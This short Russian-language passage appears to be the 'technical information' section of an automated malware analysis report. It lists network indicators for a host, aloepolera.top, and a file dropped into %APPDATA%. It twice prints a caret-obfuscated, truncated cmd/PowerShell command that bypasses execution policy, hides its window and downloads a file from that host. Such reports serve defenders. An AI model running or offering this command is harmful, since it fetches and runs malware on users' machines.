Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWERsH^ELL.EXE -^ex^EcU^tIoN^Po^LICy ^byP^a^S^S^ ^-N^oPROF^I^L^e -wi^ndO^W^sT^yLE HI^D^d^E^n ^(NEw-O^bjec^T ^SYS^T^Em.N^e^t^.w^e^B^Cl^I^Ent^).^DoWnLOa^D^F^ilE^(^'http://aloepol...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "PoWERsH^ELL.EXE -^ex^EcU^tIoN^Po^LICy ^byP^a^S^S^ ^-N^oPROF^I^L^e -wi^ndO^W^sT^yLE HI^D^d^E^n ^(NEw-O^bjec^T ^SYS^T^Em.N^e^t^.w^e^B^Cl^I^Ent^).^DoWnLOa^D^F^ilE^(^'http://aloepol...' (со скрытым окном)